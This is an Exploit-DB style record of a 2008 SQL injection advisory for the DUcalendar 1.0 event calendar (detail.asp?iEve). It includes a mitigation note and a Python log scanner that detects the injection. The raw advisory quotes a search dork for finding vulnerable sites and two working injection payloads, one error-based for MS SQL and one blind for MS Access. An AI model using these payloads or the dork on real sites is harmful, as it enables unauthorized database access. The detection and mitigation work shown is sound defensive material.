Vendor: DUcalendar
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: 89 (Remote SQL Injection)
Product Name: DUcalendar
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codedworld:ducalendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2008

DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Injection Exploit

DUcalendar is a free event calendar written in ASP. Version 1.0 places the iEve parameter of detail.asp into a database query, so a remote request can inject SQL through that parameter. The advisory gives one probe per backend: for MS SQL Server, the error-based payload convert(int,(select+@@version))--, and for MS Access, the blind payload IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00.

Mitigation:

Developers should validate that iEve is an integer event id before use and pass it to the database as a bound query parameter rather than concatenating it into the SQL string, which prevents this class of SQL injection.
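Added here as an example that is not part of the advisory or of DUcalendar: a Python scanner over constructed IIS-style log lines that flags detail.asp requests whose iEve value is not a plain integer and labels which of the two payload families quoted above it matches; the same integer check is the allow-list validation a fixed detail.asp should apply. The log format, field order and sample lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log excerpt (not real traffic). Fields:
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-06-24 10:01:02 GET /calendar/detail.asp iEve=42 200
2008-06-24 10:01:09 GET /calendar/detail.asp iEve=convert(int,(select+@@version))-- 500
2008-06-24 10:01:15 GET /calendar/detail.asp iEve=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00 200
2008-06-24 10:02:00 GET /calendar/index.asp - 200
"""

# Signatures for the two payload families quoted in the advisory, plus generic
# signs of an integer id being abused (inline comment, NUL terminator).
SIGNATURES = {
    "mssql_error_based": re.compile(r"convert\s*\(\s*int", re.I),
    "mssql_version_probe": re.compile(r"@@version", re.I),
    "access_blind_iif": re.compile(r"\bIIF\s*\(", re.I),
    "access_system_table": re.compile(r"MSysObjects", re.I),
    "inline_comment": re.compile(r"--|/\*"),
    "nul_byte": re.compile("\x00"),
}

def is_valid_event_id(value):
    """The only legitimate iEve value is a positive integer event id; this is
    also the allow-list check a fixed detail.asp should apply before querying."""
    return re.fullmatch(r"[1-9][0-9]{0,9}", value) is not None

def analyse_line(line):
    """Return a finding dict for a detail.asp request whose iEve value is not a
    plain integer, or None when the request is clean or irrelevant."""
    date, time, _method, stem, query, status = line.split()
    if not stem.lower().endswith("/detail.asp") or query == "-":
        return None
    # parse_qs percent-decodes and turns '+' into a space, so the signatures
    # see the value the ASP page would actually splice into its SQL string.
    value = parse_qs(query, keep_blank_values=True).get("iEve", [""])[0]
    if is_valid_event_id(value):
        return None
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return {"time": f"{date} {time}", "status": status, "signatures": hits}

def scan_log(text):
    """Scan a whole log; every non-integer iEve is reported even with no
    signature hit, because the parameter has no legitimate non-numeric form."""
    findings = (analyse_line(l) for l in text.splitlines() if l.strip())
    return [f for f in findings if f is not None]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```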

Exploit-DB raw data:

DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Injection Exploit


[+] Script : DUcalendar 

[+] Version : 1.0 (Maybe others) 

[+] Exploit : Remote SQL Injection 

[+] Script URL : http://www.codedworld.com/download/ducalendar-/545.html 

[+] Description : ('Free Event Calendar written in ASP. Features include 
unlimited entries, organized in category. Events displayed with full 
description, date, location. Users can submit new events and search for 
events. Complete Web-based Admin. Dreamweaver friendly.') 

[+] Dork : intitle:"DUcalendar 1.0" 

--//--> Exploit : 

http://d0rk.co.il/calendar/detail.asp?iEve={SQL} 

--__--> For Ms SQL Server : convert(int,(select+@@version))-- 

--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00 


--//--> Greetz : allah , Underz0ne Crew , and all my friends .. 

# milw0rm.com [2008-06-24]